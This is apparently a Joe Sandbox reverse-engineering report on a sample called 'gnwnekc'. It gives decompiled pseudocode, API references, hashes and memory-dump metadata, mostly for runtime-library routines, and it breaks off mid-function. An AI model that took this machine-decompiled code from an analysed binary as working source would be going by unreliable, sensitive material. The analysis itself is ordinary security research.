Opcode ID: 6f166a4ca9b15468caa8685c1b769f618a0582618230dc9a1c67b59fe4a86ca6
Instruction ID: 44da02c1f9cc79079b9295c2c5443da2eefbb780e6402fb1b3523568508803b7
Opcode Fuzzy Hash: 6f166a4ca9b15468caa8685c1b769f618a0582618230dc9a1c67b59fe4a86ca6
Instruction Fuzzy Hash: 23014C327005147BCB059F99DC45CAE3B29DFC1320729022AF812BB2D1EA34DD419754

Uniqueness

Uniqueness Score: -1.00%

Function 00407D2C Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00407D2C() {
				void* _t3;
				void* _t16;
				WCHAR* _t17;

				_t17 = GetEnvironmentStringsW();
				if(_t17 != 0) {
					_t11 = E00407D7C(_t17) - _t17 & 0xfffffffe;
					_t3 = E004069B7(E00407D7C(_t17) - _t17 & 0xfffffffe); // executed
					_t16 = _t3;
					if(_t16 != 0) {
						E00409670(_t16, _t17, _t11);
					}
					E00405BB5(0);
					FreeEnvironmentStringsW(_t17);
				} else {
					_t16 = 0;
				}
				return _t16;
			}

0x00407d36
0x00407d3a
0x00407d4b
0x00407d4f
0x00407d54
0x00407d5a
0x00407d5f
0x00407d64
0x00407d69
0x00407d70
0x00407d3c
0x00407d3c
0x00407d3c
0x00407d7b

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00282E58,00402F05,00000000,00282E58,00402FE4,00407E36,00000000,00000000,00000000,?,00403160,00000000,00000000), ref: 00407D30
_free.LIBCMT ref: 00407D69
FreeEnvironmentStringsW.KERNEL32(00000000,00000000,?,00403160,00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00407D70

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: EnvironmentStrings$Free_free
String ID:
API String ID: 2716640707-0
Opcode ID: e8e4aa606fca1511f428dae779e9d055dab3f6ff5b9c17f9b1d491d70a1a3b64
Instruction ID: fb2cf39da888a10db5f46b23b65b40f5778fca8442aa9d19c350dd2f880b8073
Opcode Fuzzy Hash: e8e4aa606fca1511f428dae779e9d055dab3f6ff5b9c17f9b1d491d70a1a3b64
Instruction Fuzzy Hash: C1E02B77608A1027D222223A7C89DBB162DCFC5378B25013BF425763C2FE785C0240BE

Uniqueness

Uniqueness Score: -1.00%

Function 004048D4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E004048D4(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				int _t7;
				intOrPtr* _t11;

				_t11 = E00404AB4(0x12, "InitializeCriticalSectionEx", 0x40f600, 0x40f608);
				if(_t11 == 0) {
					_t7 = InitializeCriticalSectionAndSpinCount(_a4, _a8); // executed
					return _t7;
				}
				 *0x418000(_a4, _a8, _a12);
				return  *_t11();
			}

0x004048f0
0x004048f7
0x00404914
0x00000000
0x00404914
0x00404904
0x00000000

APIs

InitializeCriticalSectionAndSpinCount.KERNELBASE(?,?), ref: 00404914

Strings

InitializeCriticalSectionEx, xrefs: 004048E4

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: ee9e81118929fe9f91603bc4a054c557b6e1e9d628955804a25df52520f7c22d
Instruction ID: 8a833d066a978b0f130d7e2ca597e35b32d2164a9864159e328ad9a028cbbcbf
Opcode Fuzzy Hash: ee9e81118929fe9f91603bc4a054c557b6e1e9d628955804a25df52520f7c22d
Instruction Fuzzy Hash: CFE0927128121CBBCF211F51CC05EDF7F25EB94760B208036FE18251B1C67A8921AACC

Uniqueness

Uniqueness Score: -1.00%

Function 004047D5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004047D5(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t7;

				_t2 = E00404AB4(3, "FlsAlloc", 0x40f5e0, 0x40f5e8); // executed
				_t7 = _t2;
				if(_t7 == 0) {
					return TlsAlloc();
				}
				 *0x418000(_a4);
				return  *_t7();
			}

0x004047ec
0x004047f1
0x004047f8
0x00000000
0x00404809
0x004047ff
0x00000000

APIs

TlsAlloc.KERNEL32 ref: 00404809

Strings

FlsAlloc, xrefs: 004047E5

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 0528a5645a93e07f6ff5f16f19ddf89c9b12ec8d641c766216609d0e1e168e65
Instruction ID: a5514183a778f22fdfc75292032c2024479d6a2b8f9441e5aa68e4f99bdff5fa
Opcode Fuzzy Hash: 0528a5645a93e07f6ff5f16f19ddf89c9b12ec8d641c766216609d0e1e168e65
Instruction Fuzzy Hash: 0AE0C27A68026477C2223B91AC06BDA7D049B84BA1B158033FB09322D3DAB8091185ED

Uniqueness

Uniqueness Score: -1.00%

Function 004054A4 Relevance: 3.2, APIs: 2, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004054A4(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				signed int _t55;
				int _t57;
				signed int _t60;
				signed int _t61;
				short _t64;
				signed char _t66;
				signed int _t67;
				signed char* _t75;
				signed char* _t76;
				int _t78;
				signed int _t83;
				signed char* _t84;
				short* _t85;
				signed int _t86;
				signed char _t87;
				signed int _t88;
				void* _t89;
				signed int _t90;
				signed int _t91;
				short _t92;
				signed int _t93;
				intOrPtr _t95;
				signed int _t96;

				_t89 = __edx;
				_t51 =  *0x416010; // 0x2fe432c7
				_v8 = _t51 ^ _t96;
				_t95 = _a8;
				_t78 = E00405697(__eflags, _a4);
				if(_t78 == 0) {
					L36:
					E00405708(_t95);
					goto L37;
				} else {
					_t92 = 0;
					_t83 = 0;
					_t57 = 0;
					_v32 = 0;
					while( *((intOrPtr*)(_t57 + 0x4164a0)) != _t78) {
						_t83 = _t83 + 1;
						_t57 = _t57 + 0x30;
						_v32 = _t83;
						if(_t57 < 0xf0) {
							continue;
						} else {
							if(_t78 == 0xfde8) {
								L22:
								_t55 = _t57 | 0xffffffff;
							} else {
								_t57 = IsValidCodePage(_t78 & 0x0000ffff);
								if(_t57 == 0) {
									goto L22;
								} else {
									if(_t78 != 0xfde9) {
										_t57 = GetCPInfo(_t78,  &_v28);
										__eflags = _t57;
										if(_t57 == 0) {
											__eflags =  *0x417368 - _t92; // 0x0
											if(__eflags != 0) {
												goto L36;
											} else {
												goto L22;
											}
										} else {
											_t14 = _t95 + 0x18; // 0x40a953
											E00402060(_t92, _t14, _t92, 0x101);
											 *(_t95 + 4) = _t78;
											__eflags = _v28 - 2;
											 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
											if(_v28 == 2) {
												__eflags = _v22;
												_t75 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t87 = _t75[1];
														__eflags = _t87;
														if(_t87 == 0) {
															goto L18;
														}
														_t90 = _t87 & 0x000000ff;
														_t88 =  *_t75 & 0x000000ff;
														while(1) {
															__eflags = _t88 - _t90;
															if(_t88 > _t90) {
																break;
															}
															 *(_t95 + _t88 + 0x19) =  *(_t95 + _t88 + 0x19) | 0x00000004;
															_t88 = _t88 + 1;
															__eflags = _t88;
														}
														_t75 =  &(_t75[2]);
														__eflags =  *_t75;
														if( *_t75 != 0) {
															continue;
														}
														goto L18;
													}
												}
												L18:
												_t25 = _t95 + 0x1a; // 0x40a955
												_t76 = _t25;
												_t86 = 0xfe;
												do {
													 *_t76 =  *_t76 | 0x00000008;
													_t76 =  &(_t76[1]);
													_t86 = _t86 - 1;
													__eflags = _t86;
												} while (_t86 != 0);
												_t26 = _t95 + 4; // 0xc033a47d
												 *((intOrPtr*)(_t95 + 0x21c)) = E004059A9( *_t26);
												_t92 = 1;
											}
											goto L8;
										}
									} else {
										 *(_t95 + 4) = 0xfde9;
										 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
										 *((intOrPtr*)(_t95 + 0x18)) = _t92;
										 *((short*)(_t95 + 0x1c)) = _t92;
										L8:
										 *((intOrPtr*)(_t95 + 8)) = _t92;
										_t12 = _t95 + 0xc; // 0x40a947
										_t92 = _t12;
										asm("stosd");
										asm("stosd");
										asm("stosd");
										L9:
										E004059E7(_t90, _t95); // executed
										L37:
										_t55 = 0;
									}
								}
							}
						}
						goto L38;
					}
					_t28 = _t95 + 0x18; // 0x40a953
					E00402060(_t92, _t28, _t92, 0x101);
					_t60 = _v32 * 0x30;
					__eflags = _t60;
					_v36 = _t60;
					_t61 = _t60 + 0x4164b0;
					_v32 = _t61;
					do {
						__eflags =  *_t61;
						_t84 = _t61;
						if( *_t61 != 0) {
							while(1) {
								_t66 = _t84[1];
								__eflags = _t66;
								if(_t66 == 0) {
									break;
								}
								_t91 =  *_t84 & 0x000000ff;
								_t67 = _t66 & 0x000000ff;
								while(1) {
									__eflags = _t91 - _t67;
									if(_t91 > _t67) {
										break;
									}
									__eflags = _t91 - 0x100;
									if(_t91 < 0x100) {
										_t34 = _t92 + 0x416498; // 0x8040201
										 *(_t95 + _t91 + 0x19) =  *(_t95 + _t91 + 0x19) |  *_t34;
										_t91 = _t91 + 1;
										__eflags = _t91;
										_t67 = _t84[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t84 =  &(_t84[2]);
								__eflags =  *_t84;
								if( *_t84 != 0) {
									continue;
								}
								break;
							}
							_t61 = _v32;
						}
						_t92 = _t92 + 1;
						_t61 = _t61 + 8;
						_v32 = _t61;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t95 + 4) = _t78;
					 *((intOrPtr*)(_t95 + 8)) = 1;
					 *((intOrPtr*)(_t95 + 0x21c)) = E004059A9(_t78);
					_t46 = _t95 + 0xc; // 0x40a947
					_t85 = _t46;
					_t90 = _v36 + 0x4164a4;
					_t93 = 6;
					do {
						_t64 =  *_t90;
						_t90 = _t90 + 2;
						 *_t85 = _t64;
						_t49 = _t85 + 2; // 0x8babab84
						_t85 = _t49;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L9;
				}
				L38:
				return E00401C35(_t55, _t78, _v8 ^ _t96, _t89, _t92, _t95);
			}

0x004054a4
0x004054ac
0x004054b3
0x004054b8
0x004054c4
0x004054c9
0x0040567f
0x00405680
0x00000000
0x004054cf
0x004054cf
0x004054d1
0x004054d3
0x004054d5
0x004054d8
0x004054e4
0x004054e5
0x004054e8
0x004054f0
0x00000000
0x004054f2
0x004054f8
0x004055cf
0x004055cf
0x004054fe
0x00405502
0x0040550a
0x00000000
0x00405510
0x00405517
0x00405544
0x0040554a
0x0040554c
0x004055c3
0x004055c9
0x00000000
0x00000000
0x00000000
0x00000000
0x0040554e
0x00405553
0x00405558
0x00405560
0x00405563
0x00405567
0x0040556d
0x0040556f
0x00405573
0x00405576
0x00405578
0x00405578
0x0040557b
0x0040557d
0x00000000
0x00000000
0x0040557f
0x00405582
0x0040558d
0x0040558d
0x0040558f
0x00000000
0x00000000
0x00405587
0x0040558c
0x0040558c
0x0040558c
0x00405591
0x00405594
0x00405597
0x00000000
0x00000000
0x00000000
0x00405597
0x00405578
0x00405599
0x00405599
0x00405599
0x0040559c
0x004055a1
0x004055a1
0x004055a4
0x004055a5
0x004055a5
0x004055a5
0x004055aa
0x004055b4
0x004055bd
0x004055bd
0x00000000
0x0040556d
0x00405519
0x00405519
0x0040551c
0x00405522
0x00405525
0x00405529
0x00405529
0x0040552e
0x0040552e
0x00405531
0x00405532
0x00405533
0x00405534
0x00405535
0x00405685
0x00405685
0x00405687
0x00405517
0x0040550a
0x004054f8
0x00000000
0x004054f0
0x004055dc
0x004055e1
0x004055e9
0x004055e9
0x004055ed
0x004055f0
0x004055f6
0x004055f9
0x004055f9
0x004055fc
0x004055fe
0x00405600
0x00405600
0x00405603
0x00405605
0x00000000
0x00000000
0x00405607
0x0040560a
0x00405626
0x00405626
0x00405628
0x00000000
0x00000000
0x0040560f
0x00405615
0x00405617
0x0040561d
0x00405621
0x00405621
0x00405622
0x00000000
0x00405622
0x00000000
0x00405615
0x0040562a
0x0040562d
0x00405630
0x00000000
0x00000000
0x00000000
0x00405630
0x00405632
0x00405632
0x00405635
0x00405636
0x00405639
0x0040563c
0x0040563c
0x00405642
0x00405645
0x00405654
0x0040565d
0x0040565d
0x00405662
0x00405668
0x00405669
0x00405669
0x0040566c
0x0040566f
0x00405672
0x00405672
0x00405675
0x00405675
0x00405675
0x00000000
0x0040567a
0x00405688
0x00405696

APIs

Part of subcall function 00405697: GetOEMCP.KERNEL32(00000000,00405828,0040A93B,00000000,?,?,00000000,?,0040A93B), ref: 004056C2

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0040586F,?,00000000,0040A93B,558B0000,?,?,?,?,?), ref: 00405502
GetCPInfo.KERNEL32(00000000,0040586F,?,?,0040586F,?,00000000,0040A93B,558B0000,?,?,?,?,?,00000000), ref: 00405544

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 0f21bd47a8b32e3c5a88146ca5cda61a09d08f1df18d1680a2ce81fd349fed21
Instruction ID: a42d7a1bd8c3dce034ae1aabd50fd8a6a95c3542f058937f4eeaa0d27c1a08c2
Opcode Fuzzy Hash: 0f21bd47a8b32e3c5a88146ca5cda61a09d08f1df18d1680a2ce81fd349fed21
Instruction Fuzzy Hash: FF512370A00B45AEDB208F61C8406ABBBF6EF50304F54483FD096A72D1D67D9A42CF98

Uniqueness

Uniqueness Score: -1.00%

Function 003C037C Relevance: 3.1, APIs: 2, Instructions: 67COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(?), ref: 003C0406
CreateDirectoryW.KERNELBASE(?,00000000), ref: 003C0412

Memory Dump Source

Source File: 00000006.00000002.914080499.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3c0000_gnwnekc.jbxd

Similarity

API ID: CreateDirectoryExistsFilePath
String ID:
API String ID: 2624722123-0
Opcode ID: 2d927dbdc0c98ac60f85d63aaf64e35996fbb75628e29af14dbdce1127c1c687
Instruction ID: 707f9ba86e5c902954d1ca71bfb1ced82dfc2309287d69dcc66cefd1a0c4229e
Opcode Fuzzy Hash: 2d927dbdc0c98ac60f85d63aaf64e35996fbb75628e29af14dbdce1127c1c687
Instruction Fuzzy Hash: 0F117325A58348B4EB14ABF4EC12FBE6775DF40B50F10551FF904EF1A0E6764A908399

Uniqueness

Uniqueness Score: -1.00%

Function 0040A017 Relevance: 3.1, APIs: 2, Instructions: 67
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E0040A017(void* __ecx, signed int _a4, CHAR* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _v8;
				_Unknown_base(*)()** _v12;
				_Unknown_base(*)()** _t23;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__* _t26;
				signed int* _t33;
				signed int _t36;
				struct HINSTANCE__** _t38;
				signed int _t44;
				signed int _t45;
				struct HINSTANCE__* _t49;

				_push(_t44);
				_t23 = 0x4173b8 + _a4 * 4;
				_v12 = _t23;
				_t24 =  *_t23;
				_t45 = _t44 | 0xffffffff;
				if(_t24 != _t45) {
					if(_t24 != 0) {
						L13:
						return _t24;
					}
					_t33 = _a12;
					while(_t33 != _a16) {
						_t36 =  *_t33;
						_v8 = _t36;
						_t49 =  *(0x4173ac + _t36 * 4);
						if(_t49 == 0) {
							_t26 = E00409FCC( *((intOrPtr*)(0x41013c + _t36 * 4))); // executed
							_t49 = _t26;
							_t38 = 0x4173ac + _v8 * 4;
							if(_t49 != 0) {
								 *_t38 = _t49;
								if( *_t38 != 0) {
									FreeLibrary(_t49);
								}
								L16:
								_t24 = GetProcAddress(_t49, _a8);
								if(_t24 == 0) {
									break;
								}
								 *_v12 = _t24;
								L12:
								goto L13;
							}
							 *_t38 = _t45;
							L9:
							_t33 =  &(_t33[1]);
							continue;
						}
						if(_t49 != _t45) {
							goto L16;
						}
						goto L9;
					}
					 *_v12 = _t45;
					_t24 = 0;
					goto L12;
				}
				_t24 = 0;
				goto L13;
			}

0x0040a01f
0x0040a020
0x0040a027
0x0040a02a
0x0040a02d
0x0040a032
0x0040a03a
0x0040a08e
0x0040a090
0x0040a090
0x0040a03d
0x0040a080
0x0040a043
0x0040a045
0x0040a04f
0x0040a054
0x0040a063
0x0040a06b
0x0040a06e
0x0040a077
0x0040a093
0x0040a097
0x0040a09a
0x0040a09a
0x0040a0a0
0x0040a0a4
0x0040a0ac
0x00000000
0x00000000
0x0040a0b3
0x0040a08c
0x00000000
0x0040a08d
0x0040a07b
0x0040a07d
0x0040a07d
0x00000000
0x0040a07d
0x0040a058
0x00000000
0x00000000
0x00000000
0x0040a05a
0x0040a088
0x0040a08a
0x00000000
0x0040a08a
0x0040a034
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,00416F08,?,?,?,00409F9F,00000004,InitializeCriticalSectionEx,00410168,00410170,00000000,?,004043D0,00416F08,00000FA0), ref: 0040A09A
GetProcAddress.KERNEL32(00000000,?,?,00416F08,?,?,?,00409F9F,00000004,InitializeCriticalSectionEx,00410168,00410170,00000000,?,004043D0,00416F08), ref: 0040A0A4

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID:
API String ID: 3013587201-0
Opcode ID: 78eab97d538da3307db90c5152bdd002ef4c9f52a44079731835acbadf9e9fcb
Instruction ID: 9fdaa8e927d6de20b596cf0b135b7a964002c4763f17e634ff29b150ae83185b
Opcode Fuzzy Hash: 78eab97d538da3307db90c5152bdd002ef4c9f52a44079731835acbadf9e9fcb
Instruction Fuzzy Hash: 92119A3260021DAFCB22CF64D88099A73B4BB46360724417AED51EB290E639ED11CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00405312 Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00405312() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed char _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x417158 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							_t25 = 0;
						} else {
							_t25 = GetFileType(_t28); // executed
						}
						if(_t25 == 0) {
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x417390; // 0x283810
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
						} else {
							_t20 = _t25 & 0x000000ff;
							 *(_t33 + 0x18) = _t28;
							if(_t20 != 2) {
								if(_t20 == 3) {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
								}
							} else {
								 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}

0x00405317
0x00405319
0x0040531d
0x00405326
0x00405331
0x00405341
0x00405345
0x00405348
0x0040535a
0x0040534a
0x0040534d
0x00405356
0x0040534f
0x00405352
0x00405352
0x0040534d
0x0040535c
0x00405364
0x00405369
0x00405378
0x0040536f
0x00405370
0x00405370
0x0040537c
0x0040539a
0x0040539e
0x004053a5
0x004053ac
0x004053ae
0x004053b1
0x004053b1
0x0040537e
0x0040537e
0x00405381
0x00405387
0x00405392
0x00405394
0x00405394
0x00405389
0x00405389
0x00405389
0x00405387
0x00405339
0x00405339
0x00405339
0x004053b8
0x004053b9
0x004053c5

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00405201,00415118,0000000C), ref: 0040535E
GetFileType.KERNELBASE(00000000), ref: 00405370

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 0903183e3e9cf8da30489f04e8bee3f85a189a1ade626cf4d41bf0ba5f4ce8af
Instruction ID: 2a536b4d2e018bea06c5d9b46e4d698b8ddbe8db1171594862c8f5111bbd19d6
Opcode Fuzzy Hash: 0903183e3e9cf8da30489f04e8bee3f85a189a1ade626cf4d41bf0ba5f4ce8af
Instruction Fuzzy Hash: C911DA71504F418AD7304A3D8C98627BA94E7563B0B38073BDDB6E67F1C3B8D8429A4D

Uniqueness

Uniqueness Score: -1.00%

Function 00404295 Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00404295(void* __ecx) {
				intOrPtr _t1;
				void* _t2;
				void* _t7;
				void* _t9;

				_t1 = E00409E96(__ecx, E00404383); // executed
				 *0x416024 = _t1;
				_pop(_t7);
				if(_t1 != 0xffffffff) {
					_t2 = E00409F47(_t7, _t1, 0x416ea4);
					_pop(_t9);
					if(_t2 != 0) {
						return 1;
					} else {
						E004042C8(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x0040429a
0x0040429f
0x004042a4
0x004042a8
0x004042b3
0x004042b9
0x004042bc
0x004042c7
0x004042be
0x004042be
0x00000000
0x004042be
0x004042aa
0x004042aa
0x004042ac
0x004042ac

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004042B3
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 004042BE

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: b125dddd65666ed71bbebfa495ee445cac2e4d5b4cd2a4ac5d1d26546ec32169
Instruction ID: 7a41f60f7a33acbadd3e78c2f252c11b0a25c7f3afcd7272ed05a330133e31f8
Opcode Fuzzy Hash: b125dddd65666ed71bbebfa495ee445cac2e4d5b4cd2a4ac5d1d26546ec32169
Instruction Fuzzy Hash: 47D0A7A871430259DE0077B1A80258613844ED1BF837143FFFB30F55C2EA3DC841111E

Uniqueness

Uniqueness Score: -1.00%

Function 00403F84 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403F84(signed int __edx, intOrPtr* _a4) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* __edi;
				void* __esi;
				signed int _t58;
				signed int _t59;
				signed char _t61;
				signed int _t63;
				signed char _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t76;
				void* _t77;
				intOrPtr _t78;
				signed int _t86;
				intOrPtr _t90;
				signed int _t91;
				signed int _t92;
				intOrPtr* _t93;
				signed char _t94;
				signed int _t95;
				signed int _t96;
				signed int _t98;
				signed int _t102;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				intOrPtr* _t112;
				void* _t115;
				void* _t116;

				_t97 = __edx;
				_t119 = _a4;
				if(_a4 != 0) {
					_t58 = E00408AE8(_a4);
					_t90 = _a4;
					_t106 = _t58;
					__eflags =  *(_t90 + 8);
					if( *(_t90 + 8) < 0) {
						 *(_t90 + 8) = 0;
					}
					_t59 = E00409BE4(_t106, 0, 0, 1); // executed
					_t91 = _t97;
					_t116 = _t115 + 0x10;
					_v12 = _t91;
					_t111 = _t59;
					_v24 = _t111;
					__eflags = _t91;
					if(__eflags > 0) {
						L7:
						_t61 =  *(_a4 + 0xc);
						__eflags = _t61 & 0x000000c0;
						if((_t61 & 0x000000c0) != 0) {
							_t63 = _t106 >> 6;
							_t92 = (_t106 & 0x0000003f) * 0x38;
							_v16 = _t63;
							_v20 = _t92;
							_t93 = _a4;
							_v8 =  *((intOrPtr*)(_t92 +  *((intOrPtr*)(0x417158 + _t63 * 4)) + 0x29));
							_t94 =  *(_t93 + 0xc);
							asm("cdq");
							_t108 =  *_t93 -  *((intOrPtr*)(_t93 + 4));
							_t86 = _t97;
							__eflags = _t94 & 0x00000003;
							if((_t94 & 0x00000003) == 0) {
								__eflags =  *(_a4 + 0xc) >> 0x00000002 & 0x00000001;
								if(__eflags != 0) {
									goto L18;
								} else {
									_t59 = E004065F6(__eflags);
									 *_t59 = 0x16;
									goto L17;
								}
							} else {
								__eflags = _v8 - 1;
								_t96 = _v16;
								_t102 = _v20;
								if(_v8 != 1) {
									L13:
									_t76 =  *((intOrPtr*)(0x417158 + _t96 * 4));
									__eflags =  *((char*)(_t102 + _t76 + 0x28));
									if( *((char*)(_t102 + _t76 + 0x28)) >= 0) {
										L18:
										_t112 = _a4;
									} else {
										_t112 = _a4;
										_t77 = E00403BAE( *((intOrPtr*)(_t112 + 4)),  *_t112, _v8);
										_t116 = _t116 + 0xc;
										_t108 = _t108 + _t77;
										asm("adc ebx, edx");
									}
									_t95 = _v24;
									_t98 = _v12;
									__eflags = _t95 | _t98;
									if((_t95 | _t98) != 0) {
										_t73 =  *(_t112 + 0xc);
										__eflags = _t73 & 0x00000001;
										if((_t73 & 0x00000001) == 0) {
											__eflags = _v8 - 1;
											if(_v8 == 1) {
												_t75 = E00409DB0(_t108, _t86, 2, 0);
												_t95 = _v24;
												_t108 = _t75;
											}
											_t108 = _t108 + _t95;
											asm("adc edx, ebx");
											goto L26;
										} else {
											_t74 = E00403DC5(_a4, _t95, _t98, _t108, _t86);
										}
									} else {
										L26:
										_t74 = _t108;
									}
								} else {
									_t78 =  *((intOrPtr*)(0x417158 + _t96 * 4));
									__eflags =  *(_t102 + _t78 + 0x2d) & 0x00000002;
